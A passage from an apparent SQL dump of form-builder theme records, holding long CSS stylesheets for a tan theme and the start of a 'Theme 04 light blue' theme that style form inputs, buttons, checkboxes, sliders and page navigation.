{\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #424242 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6CE9D;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/01/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\n	padding: 13px;\r\n	text-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 10px;\r\n	height: 10px;\r\n	background: #DAA157;\r\n	background: -moz-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -webkit-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -o-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -ms-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: linear-gradient(to bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	box-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\n	border-radius: 7px;\r\n	top: 1px;\r\n	left: 1px;\r\n	border: 1px solid #C0A77E;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #E2B983;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #AA824E;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #AA824E;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #E2B983;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #AA824E;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0),
(14, 'Theme 04 light blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #CEE4E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: 